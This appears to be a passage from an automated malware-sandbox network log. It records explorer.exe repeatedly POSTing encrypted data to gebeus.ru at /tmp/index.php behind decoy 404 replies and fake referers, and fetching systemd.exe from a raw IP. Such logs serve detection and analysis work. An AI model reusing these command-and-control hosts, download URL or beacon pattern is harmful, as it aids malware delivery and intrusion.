                                      Jul 15, 2024 06:10:43.032150030 CEST162OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 33 07 fd be
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu3NI^Q<jX&.t{oYfx; N.$)$
                                      Jul 15, 2024 06:10:44.492043018 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:44 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.54971958.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:44.522825956 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://dshprjrooia.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 182
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:10:44.522847891 CEST182OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 2c 3c e6 a9
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu,<E?~_Vl):P//vPvDgl-B8(^CCA6Rxox42O:H
                                      Jul 15, 2024 06:10:46.049247980 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.54972058.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:46.058254957 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gejkxdmasvmxo.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 250
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:10:46.058290005 CEST250OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 40 1c dc 90
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu@7]awupQP[8"A[k\II7fd5vtH9=2e-ODM0/'c<('0Vz"Z{G&aD`
                                      Jul 15, 2024 06:10:47.555258989 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:47 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.54972158.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:47.564336061 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://jqchsaraxkauihtq.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 140
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:10:47.564367056 CEST140OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 5f 5e a2 93
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu_^_UNbQyDU4_c^ WO\H~
                                      Jul 15, 2024 06:10:49.150578976 CEST189INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb
                                      Data Ascii: #\.\$iDm7&W


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.54972277.221.157.163801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:49.160794020 CEST163OUTGET /systemd.exe HTTP/1.1
                                      Connection: Keep-Alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Host: 77.221.157.163


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.54972458.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:11:08.758277893 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gxmmgqbcaaod.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 135
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:11:08.758277893 CEST135OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 35 58 d0 b9
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu5XI^09FG2i$p6?q]A1
                                      Jul 15, 2024 06:11:10.287128925 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:11:09 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.54972558.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:11:10.313077927 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://xlokwbpjnmjelwgt.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 313
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:11:10.313138962 CEST313OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 3b 25 c0 87
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu;%X\YE5I;Hz?_cSTFt:IUT,MM]C?u-*Q*iVdfVxP_.kc%.b
                                      Jul 15, 2024 06:11:11.772284031 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:11:11 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.54972658.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:11:11.781486034 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ndqtpbgfxigpiob.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 355
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:11:11.781512976 CEST355OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 65 20 c4 bc
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vue D9qA&\X5J?+!hYImA.;PK}; u.hLS0Mc[jS,o(k{NNo1'fY(m
                                      Jul 15, 2024 06:11:13.237730026 CEST206INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:11:12 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c
                                      Data Ascii: #\6U9H-anYp7vZW|


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.54972858.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:11:16.430669069 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://jklgsoopefuhj.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 301
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:11:16.430692911 CEST301OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 00 6b 2c 90 f4 76 0b 75 6c 4b e0 bb
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA ,[k,vulKRN\W=5x0-G02\INB%A4AO]3A2vpx]8':57"F,i&}-fGbDWns*!+
                                      Jul 15, 2024 06:11:17.960640907 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:11:17 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.54972958.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:11:17.969032049 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://cjmjmjmgugawaqj.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 141
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:11:17.969573021 CEST141OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 5c 33 db b6
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu\3^Ou]"Hnq1?[KiOGH!@<
                                      Jul 15, 2024 06:11:19.472368956 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:11:19 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.54973058.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:11:19.485044956 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://hurkgkiufjdhatw.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 244
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:11:19.485044956 CEST244OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 66 09 c7 f2
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vufebi1AM%k$*|?~=L^@?I;6?C7o^O2-'TL-?Au@A@3{:Wf?0$
                                      Jul 15, 2024 06:11:20.972762108 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:11:20 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.54973158.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:12:30.891498089 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://twuefpujaurvfca.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 122
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:12:30.891510963 CEST122OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 4c bc 83
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vuRLzO~Rn$X6WB@=
